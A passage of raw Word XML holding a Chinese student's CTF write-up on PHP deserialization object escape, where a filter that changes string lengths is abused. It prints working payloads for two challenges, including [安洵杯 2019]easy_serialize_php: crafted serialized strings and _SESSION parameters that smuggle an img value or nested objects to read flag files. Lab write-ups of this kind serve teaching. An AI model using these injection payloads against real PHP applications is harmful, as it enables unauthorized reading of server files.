        <w:lastRenderedPageBreak/>
        <w:t>改变</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,导致逃逸出新的对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EEB3B" w14:textId="77777777" w:rsidR="006F4352" w:rsidRPr="006F4352" w:rsidRDefault="006F4352" w:rsidP="006F4352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35031478" w14:textId="77777777" w:rsidR="006F4352" w:rsidRPr="006F4352" w:rsidRDefault="006F4352" w:rsidP="006F4352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>同时对象逃逸的特点是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E12F8" w14:textId="2E56C853" w:rsidR="006F4352" w:rsidRDefault="006F4352" w:rsidP="006F4352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>过滤函数放在了序列化函数之后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4FDE82" w14:textId="5D181092" w:rsidR="006F4352" w:rsidRDefault="006F4352" w:rsidP="006F4352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4087BA" w14:textId="658CEC70" w:rsidR="006F4352" w:rsidRDefault="006F4352" w:rsidP="006F4352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4352">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>read函数，将\0\0\0 (6个字符) 替换成 chr(0)*chr(0) (3个字符)，所以这里逃逸处3个字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B4A9BB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我们要逃逸出的字符串是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E03424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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>";s:8:"password";s:xx:" 共23位（因为这里payload打在password里，所以xx一定是两位数） 为什么是这个字符串在下面解释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D0E50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6D5AE69B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因为一组逃逸出三个字符，所以这里共需逃逸八组，也就是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534DB674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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 （24个\0）将其传入payload1中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D5A94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0368C2D3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只序列化后的结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506D112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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O:1:"A":2:{s:8:"username";s:48:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:72:"A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php"}}";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F9720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0CA57C92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经过函数过滤后的结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A8ADA1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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O:1:"A":2:{s:8:"username";s:48:"********";s:8:"password";s:72:"A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php"}}";} （实际每个*号前后有两个空字符，这里未显示）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3919C2FE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2C5A6B62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可以看到，反序列化过程中，在读入</w:t>
      </w:r>
      <w:r w:rsidRPr="008733B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username的值时，读入48位，从第一个 空*空 开始读，********";s:8:"password";s:72:"A （因为总逃逸的字符串有24位，需要逃逸的只有23位，这里加上一个A字符，凑成24位）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D651AA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7007B009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读完此时，结束，发现原本的</w:t>
      </w:r>
      <w:r w:rsidRPr="008733B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password属性被吞，但因为序列化字符串中类里面的变量数是2，所以此时继续读一个变量，读入我们传的password，也就是读出了我们希望传入的password，这时新对象即逃逸出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F93BD5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构成对象逃逸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0179503F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260829B9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成功完成攻击，读取出</w:t>
      </w:r>
      <w:r w:rsidRPr="008733B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223577D3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7842A1EB" w14:textId="77777777" w:rsidR="008733B5" w:rsidRP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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>整个的</w:t>
      </w:r>
      <w:r w:rsidRPr="008733B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload就是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A576964" w14:textId="5E39817B" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008733B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&amp;b=A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F292572" w14:textId="5A8C653E" w:rsid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5714D7C2" w14:textId="30B2B5B5" w:rsid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52F1A7EF" w14:textId="1BC46B18" w:rsid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594D4771" w14:textId="04BA9E16" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064F51EA" w14:textId="77777777" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536909D0" w14:textId="63B84EC5" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733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4、</w:t>
      </w:r>
      <w:r w:rsidRPr="008733B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[安洵杯 2019]easy_serialize_php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6361A" w14:textId="56D5307F" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B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A1BBE3" wp14:editId="04B9B744">
            <wp:extent cx="5274310" cy="6313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1C0" w14:textId="77777777" w:rsidR="00A70303" w:rsidRDefault="00A70303" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78832BF3" w14:textId="4128E02F" w:rsidR="008733B5" w:rsidRDefault="00A70303" w:rsidP="008733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根据代码中的提示，phpinfo中可能存在线索</w:t>
      </w:r>
      <w:r w:rsidR="00800A1F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，于是令f=phpinfo查看：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D430A" w14:textId="1953B512" w:rsidR="00800A1F" w:rsidRDefault="00800A1F" w:rsidP="008733B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8AFBBC" wp14:editId="20F2AFEC">
            <wp:extent cx="5274310" cy="1590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031" w14:textId="4A3952BC" w:rsidR="00800A1F" w:rsidRDefault="00800A1F" w:rsidP="008733B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可知flag应该在</w:t>
      </w:r>
      <w:r w:rsidRPr="00800A1F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d0g3_f1ag.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中，要用show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E4954" w14:textId="674089FE" w:rsidR="008733B5" w:rsidRDefault="00544F3C" w:rsidP="008733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后面就有点搞不明白了，看了别人的wp想了很久才搞清楚。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FACA16" w14:textId="7D278EA5" w:rsidR="00544F3C" w:rsidRDefault="00544F3C" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71985C48" w14:textId="7D19183C" w:rsidR="00544F3C" w:rsidRDefault="00544F3C" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2797030C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过滤函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>filter()是对serialize($_SESSION)进行过滤，滤掉一些关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CBA80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正常传</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>img参数进去会被sha1加密，我们应该用别的方法控制$_SESSION中的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6BA3DA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本来挺好的序列化的字符串，按某种去掉了一些关键字，本身就不对，本身就涉及到可能破坏原有结构而无法正常反序列化的问题。这里是利用反序列化长度逃逸控制了</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>img参数。之前有一道题目是关键字替换导致字符串长度变长，把后面的原有参数挤出去了，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79DCDB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本题是关键字被置空导致长度变短，后面的值的单引号闭合了前面的值的单引号，导致一些内容逃逸。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A7E60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6C6EE0EB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extract后覆盖了两个没用的属性，但是后面又强制加了一个我们不可控的img属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B7927A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417B3CF2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根据源码，我们先对</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f传参phpinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDDD5AC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7AECB7B5" w14:textId="6D2DCEA8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构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload来对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d0g3_f1ag.php读取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66509E1A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3DCE3552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;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE05784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7B8A3CCA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解释一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B096C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这里首先</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>phpflagphpflag会被过滤为空，吃掉一部分值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B52769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5EB5C34E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$serialize_info的内容为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E127CAC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2645BD8F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a:2:{s:7:"";s:48:";s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85E027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16F523C5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刚好把后面多余的</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>img部分截断掉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569E9BF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5B393288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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5465B2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0CCE32C9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_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F09AE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6DA34F0B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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/d0g3_fllllllag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C5C59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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340F85D8" w14:textId="77777777" w:rsidR="00262170" w:rsidRPr="00262170" w:rsidRDefault="00262170" w:rsidP="00262170">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A80C0C8" w14:textId="528E7C32" w:rsidR="00BE4079" w:rsidRDefault="00262170" w:rsidP="00262170">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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_SESSION[phpflag]=;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53615A19" w14:textId="756C372F" w:rsidR="00544F3C" w:rsidRDefault="00BE4079" w:rsidP="00544F3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4ADA70" wp14:editId="191BF41C">
            <wp:extent cx="4943475" cy="21337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509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F365" w14:textId="07BF4422" w:rsidR="00AD65B4" w:rsidRDefault="00AD65B4" w:rsidP="00544F3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA5890B" w14:textId="1744E7A2" w:rsidR="00AD65B4" w:rsidRPr="00544F3C" w:rsidRDefault="00AD65B4" w:rsidP="00544F3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注：这道题确实没有完全搞明白，有很多细节的地方现在还理解不了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A8732" w14:textId="13EF92C7" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733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四、参考</w:t>
      </w:r>
      <w:r w:rsidR="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58F5BD" w14:textId="3C9FD99E" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00A15DAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/karsa/p/12775854.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F2D9B0E" w14:textId="21892927" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00A15DAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.gem-love.com/ctf/2275.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F855C73" w14:textId="4686B8D4" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00A15DAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/167721.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69435058" w14:textId="5CF43A75" w:rsidR="008733B5" w:rsidRDefault="008733B5" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00A15DAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/weixin_45645113/article/details/105309695</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CB8C439" w14:textId="051C5143" w:rsidR="00262170" w:rsidRPr="00262170" w:rsidRDefault="00262170" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262170">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/wangtanzhi/p/12261610.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D189986" w14:textId="4F9C21C7" w:rsidR="008733B5" w:rsidRPr="008733B5" w:rsidRDefault="00800A1F" w:rsidP="008733B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00A15DAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/chasingin/article/details/104189711</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="008733B5" w:rsidRPr="0087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29"/>
    <w:rsid w:val="00043D2F"/>
    <w:rsid w:val="0009751C"/>
    <w:rsid w:val="000B560A"/>
    <w:rsid w:val="001921FD"/>
    <w:rsid w:val="0024133F"/>
    <w:rsid w:val="00255A1C"/>
    <w:rsid w:val="00262170"/>
    <w:rsid w:val="00343E55"/>
    <w:rsid w:val="003859CA"/>
    <w:rsid w:val="0048195C"/>
    <w:rsid w:val="004A1F8D"/>
    <w:rsid w:val="00544F3C"/>
    <w:rsid w:val="005817B7"/>
    <w:rsid w:val="005A45A3"/>
    <w:rsid w:val="005E1F9B"/>
    <w:rsid w:val="006F0235"/>
    <w:rsid w:val="006F4352"/>
    <w:rsid w:val="00800A1F"/>
    <w:rsid w:val="008733B5"/>
    <w:rsid w:val="008A55F7"/>
    <w:rsid w:val="008F5452"/>
    <w:rsid w:val="00A70303"/>
    <w:rsid w:val="00A77DD4"/>
    <w:rsid w:val="00AD65B4"/>
    <w:rsid w:val="00B752F9"/>
    <w:rsid w:val="00BE4079"/>
    <w:rsid w:val="00C75B97"/>
    <w:rsid w:val="00D15329"/>
    <w:rsid w:val="00D74F04"/>
    <w:rsid w:val="00DC0E7F"/>
    <w:rsid w:val="00DC15CF"/>
    <w:rsid w:val="00F0526D"/>
    <w:rsid w:val="00F2217C"/>
    <w:rsid w:val="00F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55B5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E04053CC-A126-4C1D-BF65-409795D6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3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m-love.com/ctf/227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karsa/p/1277585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chasingin/article/details/10418971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weixin_45645113/article/details/10530969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reebuf.com/articles/web/1677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D8F95-4F6B-41DE-90D8-8A5C94DC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10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思捷</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>徐 思捷</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-26T13:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-30T07:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>